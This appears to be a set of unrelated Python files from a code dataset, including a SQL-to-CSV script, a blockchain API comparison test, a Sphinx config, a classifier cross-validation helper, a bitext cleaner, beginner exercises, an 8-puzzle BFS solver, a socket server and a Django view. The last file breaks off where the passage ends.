insertIntoLEADERTable(entry)\n\n\n#response Cleaning\nfor row in leader_ids:\n temp_responses = []\n for data_row in full_data:\n if row == data_row[0]:\n temp_responses.append(data_row)\n \n #Inserting Leader ids into Response Table\n insertIntoRESPONSETable(temp_responses)\n \nfull_full_data = []\nheader = ['ID',\n 'LEADERITE_ID',\n 'WELL_PREPARED',\n 'ENJOYED_CASE',\n 'CASE_TAUGHT',\n 'PACE_OF_CLASS',\n 'KEY_LEARNING_POINTS',\n 'STIMULATES_DISCUSSION',\n 'Q_A',\n 'TIME_EFFECTIVENESS',\n 'OPINIONS_OF_CLASS',\n 'TEACHING_STRENGTHS',\n 'CASE_STRENGTHS',\n 'NEW_IDEAS',\n 'TEACHING_IMPROVEMENTS']\n\nfull_full_data.append(header)\n\n#Reading from database to csv file\ncur.execute('SELECT * FROM RESPONSE')\n\ntry:\n numrows = int(cur.rowcount)\n for x in range(0,numrows):\n row = cur.fetchone()\n full_full_data.append(row)\nexcept:\n print('Error: Unable to fetch data successfully.')\n \n#writing to file\nwith open('test.csv', 'w') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerows(full_full_data)\n \n#Committing Database \ndb.commit() \ndb.close() \n\nprint(\"\\nProgram Complete!\");\n \n\n\n\n\n\n","sub_path":"ConnectToSQL.py","file_name":"ConnectToSQL.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"50721860","text":"#!/usr/bin/env python3\n\"\"\"\n Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]\n Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0\n set jobs to 0 if you want use all processors\n if last_block == 0, it is read from url1 (as reference)\n\"\"\"\n\nimport sys\nimport json\nimport os\nimport shutil\nfrom jsonsocket import JSONSocket\nfrom jsonsocket import cloutd_call\nfrom concurrent.futures import ThreadPoolExecutor\nfrom concurrent.futures import ProcessPoolExecutor\nfrom concurrent.futures import Future\nfrom concurrent.futures import wait\nfrom pathlib import Path\n\n\nwdir = Path()\nerrors = 0\n\n\ndef main():\n if len(sys.argv) < 4 or len(sys.argv) > 7:\n print(\"Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]\")\n print(\" Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0\")\n print( \" set jobs to 0 if you want use all processors\" )\n print(\" if last_block == 0, it is read from url1 (as reference)\")\n exit()\n \n global wdir\n global errors\n first_block = 0\n last_block = 0\n\n jobs = int(sys.argv[1])\n if jobs <= 0:\n import multiprocessing\n jobs = multiprocessing.cpu_count()\n \n url1 = sys.argv[2]\n url2 = sys.argv[3]\n \n if 
len(sys.argv) > 4:\n wdir = Path(sys.argv[4])\n \n if len(sys.argv) > 5:\n last_block = int(sys.argv[5])\n else:\n last_block = 0\n if len(sys.argv) == 7:\n first_block = int(sys.argv[6])\n else:\n first_block = 0\n \n last_block1 = get_last_block(url1)\n last_block2 = get_last_block(url2)\n \n if last_block1 != last_block2:\n exit(\"last block of {} ({}) is different then last block of {} ({})\".format(url1, last_block1, url2, last_block2))\n\n if last_block == 0:\n last_block = last_block1\n elif last_block != last_block1:\n print(\"WARNING: last block from cmdline {} is different then from {} ({})\".format(last_block, url1, last_block1))\n \n if last_block == 0:\n exit(\"last block cannot be 0!\")\n \n create_wdir()\n\n blocks = last_block - first_block + 1\n\n if jobs > blocks:\n jobs = blocks\n\n print(\"setup:\")\n print(\" jobs: {}\".format(jobs))\n print(\" url1: {}\".format(url1))\n print(\" url2: {}\".format(url2))\n print(\" wdir: {}\".format(wdir))\n print(\" block range: {}:{}\".format(first_block, last_block))\n\n if jobs > 1:\n blocks_per_job = blocks // jobs\n\n with ProcessPoolExecutor(max_workers=jobs) as executor:\n for i in range(jobs-1):\n executor.submit(compare_results, first_block, (first_block + blocks_per_job - 1), url1, url2)\n first_block = first_block + blocks_per_job\n executor.submit(compare_results, first_block, last_block, url1, url2)\n else:\n compare_results(first_block, last_block, url1, url2)\n \n exit( errors )\n\n\ndef create_wdir():\n global wdir\n \n if wdir.exists():\n if wdir.is_file():\n os.remove(wdir)\n \n if wdir.exists() == False:\n wdir.mkdir(parents=True)\n\n\ndef get_last_block(url, max_tries=10, timeout=0.1):\n request = bytes( json.dumps( {\n \"jsonrpc\": \"2.0\",\n \"id\": 0,\n \"method\": \"database_api.get_dynamic_global_properties\",\n \"params\": {}\n } ), \"utf-8\" ) + b\"\\r\\n\"\n \n status, response = cloutd_call(url, data=request, max_tries=max_tries, timeout=timeout)\n \n if status == False:\n return 0\n try:\n return response[\"result\"][\"head_block_number\"]\n except:\n return 0\n\n\ndef compare_results(f_block, l_block, url1, url2, max_tries=10, timeout=0.1):\n global wdir\n global errors\n \n print( \"Compare blocks [{} : {}]\".format(f_block, l_block) )\n\n for i in range(f_block, l_block+1):\n request = bytes( json.dumps( {\n \"jsonrpc\": \"2.0\",\n \"id\": i,\n \"method\": \"account_history_api.get_ops_in_block\",\n \"params\": { \"block_num\": i, \"only_virtual\": False }\n } ), \"utf-8\" ) + b\"\\r\\n\"\n\n with ThreadPoolExecutor(max_workers=2) as executor:\n #with ProcessPoolExecutor(max_workers=2) as executor:\n future1 = executor.submit(cloutd_call, url1, data=request, max_tries=max_tries, timeout=timeout)\n future2 = executor.submit(cloutd_call, url2, data=request, max_tries=max_tries, timeout=timeout)\n\n status1, json1 = future1.result()\n status2, json2 = future2.result()\n \n #status1, json1 = cloutd_call(url1, data=request, max_tries=max_tries, timeout=timeout)\n #status2, json2 = cloutd_call(url2, data=request, max_tries=max_tries, timeout=timeout)\n \n if status1 == False or status2 == False or json1 != json2:\n print(\"Difference @block: {}\\n\".format(i))\n errors += 1\n \n filename = wdir / Path(str(f_block) + \"_\" + str(l_block) + \".log\")\n try: file = filename.open( \"w\" )\n except: print( \"Cannot open file:\", filename ); return\n \n file.write(\"Difference @block: {}\\n\".format(i))\n file.write(\"{} response:\\n\".format(url1))\n json.dump(json1, file, indent=2, sort_keys=True)\n 
file.write(\"\\n\")\n file.write(\"{} response:\\n\".format(url2))\n json.dump(json2, file, indent=2, sort_keys=True)\n file.write(\"\\n\")\n file.close()\n print( \"Compare blocks [{} : {}] break with error\".format(f_block, l_block) )\n return\n\n print( \"Compare blocks [{} : {}] finished\".format(f_block, l_block) )\n\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"python_scripts/tests/api_tests/test_ah_get_ops_in_block.py","file_name":"test_ah_get_ops_in_block.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"217779442","text":"# Configuration file for the Sphinx documentation builder.\n\nimport os\nimport sys\nimport re\n\nfrom datetime import datetime\n\n# -- Path setup --------------------------------------------------------------\n\nsys.path.insert(0, os.path.abspath('../'))\npath = os.path.abspath(os.path.dirname(__file__))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = 'Lentil'\nauthor = 'Andy Kee'\ncopyright = f'{datetime.now().year} California Institute of Technology'\n\nwith open(os.path.normpath(os.path.join(path, '..', 'lentil', '__init__.py'))) as f:\n version = release = re.search(\"__version__ = '(.*?)'\", f.read()).group(1)\n\n\n# -- General configuration ---------------------------------------------------\n\nextensions = ['sphinx.ext.autodoc',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.napoleon',\n 'sphinx.ext.viewcode']\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nmaster_doc = 'index'\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n\n# -- Options for HTML output -------------------------------------------------\n\nhtml_theme = 'pydata_sphinx_theme'\nhtml_theme_options = {\n 'show_prev_next': False,\n 'google_analytics_id': 'UA-180546240-1',\n 'github_url': 'https://github.com/andykee/lentil'\n}\nhtml_logo = '_static/img/lentil.png'\n\nhtml_additional_pages = {\n 'index': 'indexcontent.html'\n}\n\nhtml_static_path = ['_static']\nhtml_show_sphinx = False\nhtml_show_sourcelink = False\nhtml_scaled_image_link = False\n\nhtml_js_files = ['js/copybutton.js']\nhtml_css_files = ['css/lentil.css', 'css/syntax-highlighting.css']\n\npygments_style = 'default'\n\n# if true, the current module name will be prepended to all description\n# unit titles (such as .. 
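The ProcessPoolExecutor loop above hands blocks_per_job to each of the first jobs-1 workers and everything left over to the last one, so the final worker can receive up to jobs-1 extra blocks. A sketch of an even split (hypothetical helper name):

def split_range(first_block, last_block, jobs):
    # Yield (start, end) pairs; divmod spreads the remainder one block at a
    # time across the first `extra` workers instead of piling it on the last.
    total = last_block - first_block + 1
    per_job, extra = divmod(total, jobs)
    start = first_block
    for i in range(jobs):
        size = per_job + (1 if i < extra else 0)
        yield start, start + size - 1
        start += size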
function::).\nadd_module_names = True\n\nautodoc_default_options = {\n 'member-order': 'alphabetical',\n 'exclude-members': '__init__, __weakref__, __dict__, __module__'\n}\n\nautosummary_generate = True\n","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"252195999","text":"\"\"\"\n Changes from our original framework (series 3b):\n - def cross_validate(create_classifier, training_set, number_of_groups):\n - def get_predictions(classifier, datapoints):\n\"\"\"\n\nfrom __future__ import division\n\n# import itertools\nimport numpy\nimport copy\n\ndef graph_results():\n return 0\n\n\ndef test_kernel(kernel_constructor, kernel_options, show_kernel_option,\n training_set, test_set, number_of_groups):\n \"\"\"\n create a kernel for each kernel_option and test it on the datasets\n :param kernel_options: a dictionary of constructor params for the kernel\n :param show_kernel_options: a function that pretty prints kernel options\n :param training_set: list of DataPoint to train from\n :param test_set: list of DataPoint to test the kernel on\n :param number_of_groups: the number of groups for cross-validation\n \"\"\"\n\n print (\"\\ncross-validating...\")\n\n best_result = 0, None\n\n for kernel_option in kernel_options:\n accuracy = cross_validate(\n kernel_constructor(kernel_option),\n training_set,\n number_of_groups)\n\n print (show_kernel_option(kernel_option, accuracy))\n\n if accuracy >= best_result[0]:\n best_result = accuracy, kernel_option\n\n best_accuracy, best_kernel_option = best_result\n\n print (\"\\nbest result:\")\n print (show_kernel_option(best_kernel_option, best_accuracy))\n classifier = kernel_constructor(best_kernel_option)()\n accuracy = run_single_test(classifier, training_set, test_set)\n print (\"best parameters applied to test \"\n \"set give accuracy of {0}\".format(accuracy))\n\n\ndef train_classifier(classifier, datapoints):\n \"\"\"\n takes a classifier and trains it on the passed data points\n \"\"\"\n training_data = numpy.array([item.feature_array for item in datapoints])\n class_labels = numpy.array([item.value for item in datapoints])\n classifier.fit(training_data, class_labels)\n\n\ndef test_classifier(classifier, datapoints):\n \"\"\"\n takes a classifier, predicts values of the passed datapoints\n and then compares the predictions with their real values\n returns the accuracy of the predictions as a fraction\n \"\"\"\n test_data = numpy.array([item.feature_array for item in datapoints])\n predictions = classifier.predict(test_data)\n result = zip(predictions, [item.value for item in datapoints])\n correct_answers = sum(\n [1 if prediction == value\n else 0\n for prediction, value\n in result])\n accuracy = correct_answers / len(predictions)\n return accuracy\n\n\ndef run_single_test(classifier, training_set, test_set):\n \"\"\"\n trains the classifier on the training set\n then returns its accuracy on the test set\n \"\"\"\n train_classifier(classifier, training_set)\n accuracy = test_classifier(classifier, test_set)\n return accuracy\n\n\ndef cross_validate(create_classifier, training_set, number_of_groups):\n \"\"\"\n takes a functions that can be called to create a classifier (as multiple\n classifiers will need to be created) and a number of groups. 
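conf.py above scrapes __version__ out of lentil/__init__.py with a regex so the docs build never has to import the package. The same idea as a guarded helper (a sketch; init_path is a hypothetical argument):

import re

def read_version(init_path):
    with open(init_path) as f:
        match = re.search(r"__version__ = '(.*?)'", f.read())
    if match is None:  # fail loudly instead of AttributeError on None
        raise RuntimeError('no __version__ assignment found')
    return match.group(1)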
It divides\n the training set into that many subgroups and does cross-validation on them\n returns the average accuracy for predicting all groups\n \"\"\"\n accuracy_sum = 0\n classifier = create_classifier()\n best_classifier = copy.deepcopy(classifier) \n best_accuracy = 0 \n for iteration in range(number_of_groups):\n testing_subset = training_set[iteration::number_of_groups]\n training_subset = [item\n for item\n in training_set\n if item not in testing_subset]\n accuracy = run_single_test(classifier, training_subset, testing_subset)\n print(accuracy)\n if (accuracy > 0.95 * best_accuracy):\n print(\".\")\n best_accuracy = accuracy\n best_classifier = copy.deepcopy(classifier)\n else:\n classifier = copy.deepcopy(best_classifier)\n accuracy_sum += accuracy\n return (accuracy_sum / number_of_groups) , best_classifier\n\ndef get_predictions(classifier, datapoints):\n \"\"\"\n A new function based on our framework, this will return the predicted labels\n :param classifier: a constructed classifier with its respectively parameters \n :datapoint: the test data without the target labels \n \"\"\" \n #classifier = create_classifier() \n test_feature_vector = numpy.array([item.feature_array for item in datapoints])\n predictions = classifier.predict(test_feature_vector)\n return predictions\n","sub_path":"mnist_test/03_b - MLP/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"126796492","text":"__author__ = 'yuhuan'\n\nfrom nlp.utilities import *\nfrom nlp.io.file import *\n\nimport sys\n\n\ndef filter_by_length_word(source_sentences, target_sentences, min_length, max_length):\n for source_sentence, target_sentence in zip(source_sentences, target_sentences):\n if min_length <= count_words(source_sentence) <= max_length:\n yield (source_sentence, target_sentence)\n\n\ndef filter_by_length_char(source_sentences, target_sentences, min_length, max_length):\n for source_sentence, target_sentence in zip(source_sentences, target_sentences):\n if min_length <= len(source_sentence) <= max_length:\n yield (source_sentence, target_sentence)\n\n\ndef do_trimming(sources, targets, minimum_length, maximum_length, granularity, filter_on):\n if filter_on == \"source\" and granularity == \"char\":\n filtered_sentences = filter_by_length_char(sources, targets, minimum_length, maximum_length)\n elif filter_on == \"source\" and granularity == \"word\":\n filtered_sentences = filter_by_length_word(sources, targets, minimum_length, maximum_length)\n elif filter_on == \"target\" and granularity == \"char\":\n filtered_sentences = filter_by_length_char(targets, sources, minimum_length, maximum_length)\n elif filter_on == \"target\" and granularity == \"word\":\n filtered_sentences = filter_by_length_word(targets, sources, minimum_length, maximum_length)\n\n # TODO: figure out why list comprehension does not work!\n filtered_source_sentences = []\n filtered_target_sentences = []\n for s, t in filtered_sentences:\n filtered_source_sentences.append(s)\n filtered_target_sentences.append(t)\n\n if filter_on == \"source\":\n return filtered_source_sentences, filtered_target_sentences\n if filter_on == \"target\":\n return filtered_target_sentences, filtered_source_sentences\n\n\ndef do_empty_line_removing(sources, targets):\n new_source_lines = []\n new_target_lines = []\n for (s, t) in zip(sources, targets):\n if s.strip() != '' and t.strip() != '':\n new_source_lines.append(s)\n 
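cross_validate() above now returns a (mean_accuracy, best_classifier) pair, but test_kernel() earlier in the file still binds the return value to a bare `accuracy` and compares it against best_result[0], which raises TypeError on Python 3. A sketch of the adjusted call site:

accuracy, best_classifier = cross_validate(
    kernel_constructor(kernel_option), training_set, number_of_groups)
if accuracy >= best_result[0]:
    best_result = accuracy, kernel_option  # best_classifier is now available too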
new_target_lines.append(t)\n\n return new_source_lines, new_target_lines\n\n\ndef do_bars_removing(sources, targets):\n regex_contains_bar = re.compile(r'\\|')\n new_source_lines = []\n new_target_lines = []\n for (s, t) in zip(sources, targets):\n if len(regex_contains_bar.findall(s)) == 0 and len(regex_contains_bar.findall(t)) == 0:\n new_source_lines.append(s)\n new_target_lines.append(t)\n\n return new_source_lines, new_target_lines\n\n\ndef do_private_area_char_removal(sources, targets):\n regex_private_char = re.compile(r'[\\ue000-\\uf8ff]+')\n new_source_lines = [regex_private_char.sub('', line) for line in sources]\n new_target_lines = [regex_private_char.sub('', line) for line in targets]\n return new_source_lines, new_target_lines\n\n\ndef do_full_width_to_half_width(sources, targets):\n regex_full_width_char = re.compile(u\"[\\uff01-\\uff5e]+\")\n new_source_lines = [regex_full_width_char.sub(full_to_half, l) for l in sources]\n new_target_lines = [regex_full_width_char.sub(full_to_half, l) for l in targets]\n return new_source_lines, new_target_lines\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 9:\n print('''\n Usage:\n You must provide all following parameters in the order listed:\n (1) Path to the file that contains source language sentences.\n (2) Path to the file that contains target language sentences.\n (3) Path for me to output the new source language sentences.\n (4) Path for me to output the new target language sentences.\n (5) Which sentences should I count to check length?\n - Say \"source\" to limit length based on source sentences.\n - Say \"target\" to limit length based on target sentences.\n (6) How do I count the length of sentence?\n - Say \"word\", and I'll count by word (using space as delimiter)\n - Say \"char\", and I'll count by characters (using len())\n (7) Min value of desired length.\n (7) Max value of desired length.\n\n Example:\n python3 clean_bitext.py corpus.en corpus.zh corpus.clean.en corpus.clean.zh target char 10 80\n\n ''')\n exit()\n\n source_file_input = sys.argv[1]\n target_file_input = sys.argv[2]\n\n source_file_output = sys.argv[3]\n target_file_output = sys.argv[4]\n\n sentence_length_limit_is_on = sys.argv[5] # \"target\" or \"source\"\n sentence_length_limit_granularity = sys.argv[6] # \"char\" # or \"word\"\n sentence_length_limit_min = int(sys.argv[7])\n sentence_length_limit_max = int(sys.argv[8])\n\n temp_source_lines = open(source_file_input)\n temp_target_lines = open(target_file_input)\n\n temp_source_lines, temp_target_lines = do_trimming(temp_source_lines, temp_target_lines, sentence_length_limit_min, sentence_length_limit_max, sentence_length_limit_granularity, sentence_length_limit_is_on)\n temp_source_lines, temp_target_lines = do_empty_line_removing(temp_source_lines, temp_target_lines)\n temp_source_lines, temp_target_lines = do_bars_removing(temp_source_lines, temp_target_lines)\n temp_source_lines, temp_target_lines = do_private_area_char_removal(temp_source_lines, temp_target_lines)\n temp_source_lines, temp_target_lines = do_full_width_to_half_width(temp_source_lines, temp_target_lines)\n\n write_lines(source_file_output, temp_source_lines)\n write_lines(target_file_output, temp_target_lines)\n\n","sub_path":"clean_bitext.py","file_name":"clean_bitext.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"303252507","text":"print(\"Ejercicio 3.17. 
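The leader-id filter above tests `row[0] is not ''`, which compares object identity rather than equality and only works when CPython happens to intern the empty string. The equality spelling is the reliable one:

if row[0] not in leader_ids and len(row[0]) < 5 and row[0] != '':
    leader_ids.append(row[0])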
Vinos.\")\nTIPO1 = 0\nTIPO2 = 0\nTIPO3 = 0\nTIPO4 = 0\nTIPO5 = 0\nMCTIPO2 = 0\nAÑO = 0\nN = int(input(\"Cuantos anos de datos se van a ingresar?: \"))\nfor i in range(1, N+1, 1) :\n TOTVIN = 0\n for J in range(1, 6, 1) :\n V=float(input(f\"Cantidad de vino del tipo {J} producido en el anio {i}: \"))\n TOTVIN += V\n if J == 1 :\n TIPO1 += V\n elif J == 2 :\n TIPO2 += V\n if V > MCTIPO2 :\n MCTIPO2 = V\n AÑO = i\n elif J == 3 :\n TIPO3 += V\n if V == 0 :\n print(f\"--El anio {i} no se produjo vino tipo 3\")\n elif J == 4 :\n TIPO4 += V\n elif J == 5 :\n TIPO5 += V\n\n print(f\"--Total de vino producido en el anio: {TOTVIN} litros\")\n\nprint(\"-------------------\")\nprint(f\"Total producido de vino tipo 1: {TIPO1} litros.\")\nprint(f\"Total producido de vino tipo 2: {TIPO2} litros.\")\nprint(f\"Total producido de vino tipo 3: {TIPO3} litros.\")\nprint(f\"Total producido de vino tipo 4: {TIPO4} litros.\")\nprint(f\"Total producido de vino tipo 5: {TIPO5} litros.\")\n\nprint(\"\")\nprint(f\"La mayor cantidad de vino tipo 2 se produjo en el anio {AÑO}, con {MCTIPO2} litros.\")\nprint(\"Fin del programa\")\n","sub_path":"libro/problemas_resueltos/Capítulo_3/3_16.py","file_name":"3_16.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"643102485","text":"#Import the necessary libraries\nfrom time import time\nfrom queue import Queue\nclass Puzzle:\n #Setting the goal state of 8-puzzle \n goal_state=[1,2,3,8,0,4,7,6,5]\n num_of_instances=0\n #constructor to initialize the class members\n def __init__(self,state,parent,action):\n self.parent=parent\n self.state=state\n self.action=action\n \n #TODO: incrementing the number of instance by 1\n Puzzle.num_of_instances+= 1\n \n #function used to display a state of 8-puzzle\n def __str__(self):\n return str(self.state[0:3])+'\\n'+str(self.state[3:6])+'\\n'+str(self.state[6:9])\n\n #method to compare the current state with the goal state\n def goal_test(self):\n #TODO: include a condition to compare the current state with the goal state\n if self.state == self.goal_state:\n return True\n return False\n \n #static method to find the legal action based on the current board position\n @staticmethod\n def find_legal_actions(i,j):\n legal_action = ['U', 'D', 'L', 'R']\n if i == 0: \n # if row is 0 in board then up is disable\n legal_action.remove('U')\n elif i == 2: \n legal_action.remove('D')\n\n #TODO: down is disable\n if j == 0:\n legal_action.remove('L')\n\n #TODO: Left is disable \n elif j == 2:\n legal_action.remove('R')\n\n #TODO: Right is disable\n return legal_action\n\n #method to generate the child of the current state of the board\n def generate_child(self):\n #TODO: create an empty list\n children=[]\n x = self.state.index(0)\n i = int(x / 3)\n j = int(x % 3)\n #TODO: call the method to find the legal actions based on i and j values\n legal_actions=self.find_legal_actions(i,j);\n\n #TODO:Iterate over all legal actions \n for action in legal_actions:\n new_state = self.state.copy()\n #if the legal action is UP\n if action == 'U':\n #Swapping between current index of 0 with its up element on the board\n new_state[x], new_state[x-3] = new_state[x-3], new_state[x]\n elif action == 'D':\n #TODO: Swapping between current index of 0 with its down element on the board\n new_state[x], new_state[x+3] = new_state[x+3], new_state[x]\n elif action == 'L':\n #TODO: Swapping between the current index of 0 with its left element on the board\n new_state[x], 
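The five TIPOn accumulators and the J == 1 through J == 5 ladder in 3_16.py above collapse into a list indexed by wine type. A sketch that keeps the same prompts and per-type logic:

totales = [0.0] * 5
mayor_tipo2, anio_mayor = 0.0, 0
for i in range(1, N + 1):
    for j in range(1, 6):
        v = float(input(f"Cantidad de vino del tipo {j} producido en el anio {i}: "))
        totales[j - 1] += v  # replaces TIPO1..TIPO5
        if j == 2 and v > mayor_tipo2:
            mayor_tipo2, anio_mayor = v, i
        elif j == 3 and v == 0:
            print(f"--El anio {i} no se produjo vino tipo 3")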
new_state[x-1] = new_state[x-1], new_state[x]\n elif action == 'R':\n #TODO: Swapping between the current index of 0 with its right element on the board\n new_state[x], new_state[x+1] = new_state[x+1], new_state[x]\n children.append(Puzzle(new_state,self,action))\n #TODO: return the children\n return children\n #method to find the solution\n def find_solution(self):\n solution = []\n solution.append(self.action)\n path = self\n while path.parent != None:\n path = path.parent\n solution.append(path.action)\n solution = solution[:-1]\n solution.reverse()\n return solution\n#method for breadth first search\n#TODO: pass the initial_state as parameter to the breadth_first_search method \ndef breadth_first_search(initial_state):\n start_node = Puzzle(initial_state, None, None)\n print(\"Initial state:\")\n print(start_node)\n if start_node.goal_test():\n return start_node.find_solution()\n q = Queue()\n #TODO: put start_node into the Queue\n q.put(start_node)\n #TODO: create an empty list of explored nodes\n explored=[]\n #TODO: Iterate the queue until empty. Use the empty() method of Queue\n while not(q.empty()):\n #TODO: get the current node of a queue. Use the get() method of Queue\n node=q.get()\n #TODO: Append the state of node in the explored list as node.state\n explored.append(node.state)\n #TODO: call the generate_child method to generate the child nodes of current node\n children=node.generate_child()\n #TODO: Iterate over each child node in children\n for child in children:\n if child.state not in explored:\n if child.goal_test():\n return child.find_solution()\n q.put(child)\n return\n#Start executing the 8-puzzle with setting up the initial state\n#Here we have considered 3 initial state intitalized using state variable\nfrom time import time\nfrom queue import Queue\n\n\nstate=[[1, 3, 4,\n 8, 6, 2,\n 7, 0, 5],\n\n [2, 8, 1,\n 0, 4, 3,\n 7, 6, 5],\n\n [2, 8, 1,\n 4, 6, 3,\n 0, 7, 5]]\n#Iterate over number of initial_state\nfor i in range(0,3):\n #TODO: Initialize the num_of_instances to zero\n Puzzle.num_of_instances=0\n #Set t0 to current time\n t0=time()\n bfs=breadth_first_search(state[i])\n #Get the time t1 after executing the breadth_first_search method\n t1=time()-t0\n print('BFS:', bfs)\n print('space:',Puzzle.num_of_instances)\n print('time:',t1)\n print()\nprint('------------------------------------------')\n","sub_path":"BFSSPG.py","file_name":"BFSSPG.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"342879168","text":"from enum import Enum\n\n\nclass Dir(Enum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n\n\ndef get_cell(grid, x, y):\n try:\n return grid[y][x]\n except IndexError:\n return None\n\n\ndef is_empty(v):\n return v is None or v == ' '\n\n\ndef follow_path(grid, x, y, dir):\n letters = []\n steps = 0\n\n while True:\n c = get_cell(grid, x, y)\n if is_empty(c):\n return letters, steps\n\n steps += 1\n if c == '+':\n if dir in (Dir.UP, Dir.DOWN):\n if not is_empty(get_cell(grid, x-1, y)):\n x = x-1\n dir = Dir.LEFT\n else:\n x = x+1\n dir = Dir.RIGHT\n else:\n if not is_empty(get_cell(grid, x, y-1)):\n y = y-1\n dir = Dir.UP\n else:\n y = y+1\n dir = Dir.DOWN\n else:\n if c not in ('-', '|'):\n letters.append(c)\n\n if dir == Dir.UP:\n y = y-1\n elif dir == Dir.DOWN:\n y = y+1\n elif dir == Dir.LEFT:\n x = x-1\n elif dir == Dir.RIGHT:\n x = x+1\n\n\ndef main():\n grid = []\n with open('day19.input.txt') as f:\n for line in f.readlines():\n grid.append([c for c in 
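breadth_first_search() above keeps `explored` as a list, so every `child.state not in explored` test scans all previously expanded states. The states are lists (unhashable), but their tuple form can live in a set for O(1) membership; a sketch of the same loop:

explored = set()
while not q.empty():
    node = q.get()
    explored.add(tuple(node.state))
    for child in node.generate_child():
        if tuple(child.state) not in explored:
            if child.goal_test():
                return child.find_solution()
            q.put(child)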
line.rstrip('\\n')])\n\n letters, steps = follow_path(grid, 1, 0, Dir.DOWN)\n print(''.join(letters))\n print(steps)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"309646580","text":"import socket\n\nhost = 'Your PC IP address'\nport = 12321\n\n\ndef main():\n sock = socket.socket()\n\n sock.bind((host, port))\n\n sock.listen(1)\n print(\"sever listening...\")\n\n while True:\n (connection, address) = sock.accept()\n print(\"connection to client successful\")\n \n sock.listen(1)\n print(\"\\nwaiting for request...\")\n request = connection.recv(1024)\n print(bytes.decode(request))\n\n print(\"Message from connected client: \" + bytes.decode(request))\n \n connection.close()\n print(\"+--connection to client closed--+\") \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Simple-Client-to-Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"288667259","text":"#kullanıcıdan 2 adet 3 basmaklı sayı al, 2si de polindromsa topla, biri polindromsa çıkar, eğer ikiside pol değilse çarp\n#BEYZA FİRDEVS SUBAŞI 180401047\n\nx = int(input(\"3 basamaklı bir sayı giriniz: \"))\nz = int(input(\"3 basamaklı bir sayı giriniz: \"))\n\ny1 = int(x/100)\nx = int(x-(y1*100))\no1 = int(x/10)\nx = int(x-(o1*10))\nb1 =int(x)\n\ny = int(z/100)\nz = int (z-(y*100))\no = int (z/10)\nz = int (z-(o*10))\nb =int (z)\n\n\nif(y1==b1 and y==b):\n print(\"Polindrom sayılardır ve iki sayının toplamı: \",(100*y1+10*o1+b1) + (100*y+10*o+b))\n\nelif(y1==b1 or y==b):\n\n if(y>y1):\n y1,y=y,y1\n o1,o=o,o1\n b1,b=b,b1\n\n\n print(\"Bir adet polindrom sayı vardır ve iki sayının farkı: \",(100*y1+10*o1+b1) - (100*y+10*o+b))\n\nelse:\n print(\"Polindrom sayılar değildir ve iki sayının çarpımı: \",(100*y1+10*o1+b1) * (100*y+10*o+b))\n","sub_path":"MY_EXERCISE/2-polindrom.py","file_name":"2-polindrom.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"427011361","text":"from django.shortcuts import render,redirect\r\nfrom django.views.generic.base import View\r\nfrom django.http import HttpResponse,JsonResponse\r\nfrom pure_pagination import Paginator,EmptyPage,PageNotAnInteger\r\nfrom django.db.models import Q\r\n\r\nfrom users.models import UserProfile\r\nfrom operation.models import UserFavorite,CourseComments,UserCourse\r\nfrom .models import Course,CourseResource,Video\r\n# Create your views here.\r\nclass CourseListView(View):\r\n def get(self,request):\r\n Flag = 3\r\n id = request.session.get(\"id\")\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n\r\n all_course=Course.objects.all()\r\n #进行搜索功能\r\n search_keywords=request.GET.get(\"keywords\",\"\")\r\n if search_keywords:\r\n all_course=Course.objects.filter(Q(name__icontains=search_keywords)\r\n |Q(tag__icontains=search_keywords)\r\n |Q(desription__icontains=search_keywords)).all()\r\n hot_course=all_course.order_by(\"-click_total\").all()[:3]\r\n #根据最新和课程点击数以及学习人数进行筛选\r\n #获取sort==students学习人数\r\n s_stu=request.GET.get(\"sort\")\r\n if s_stu==\"students\":\r\n all_course=all_course.order_by(\"-students\").all()\r\n elif s_stu==\"hot\":\r\n all_course = all_course.order_by(\"-click_total\").all()\r\n else:\r\n 
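2-polindrom.py above extracts hundreds, tens and units arithmetically to decide whether each 3-digit number is a palindrome. Comparing the decimal string with its reverse expresses the same test and works for any width (sketch):

def es_polindromo(n):
    s = str(n)
    return s == s[::-1]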
